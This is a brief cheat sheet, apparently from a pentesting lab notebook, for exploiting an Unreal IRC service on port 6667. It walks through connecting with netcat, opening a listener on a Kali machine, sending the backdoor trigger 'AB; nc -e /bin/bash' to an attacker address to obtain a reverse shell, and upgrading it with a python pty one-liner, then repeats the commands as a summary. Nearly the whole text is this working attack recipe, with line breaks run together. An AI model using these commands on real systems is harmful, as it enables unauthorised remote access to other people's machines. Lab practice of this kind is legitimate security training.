Unreal IRC 6667
1. Search for Exploits
2. Connect to Target's Unreal IRC with Netcat
sudo nc 10.10.10.10 66673. Set up a Listener on Your Kali Machine
sudo nc -lvp 44444. Execute the Payload to Create Reverse Shell
AB; nc -e /bin/bash 11.11.11.11 44445. Establish and Stabilize the Reverse Shell
python -c 'import pty; pty.spawn("/bin/bash")'Summary of Commands:
sudo nc -lvp 4444
sudo nc 10.10.10.10 6667AB; nc -e /bin/bash 11.11.11.11 4444python -c 'import pty; pty.spawn("/bin/bash")'-+6
Last updated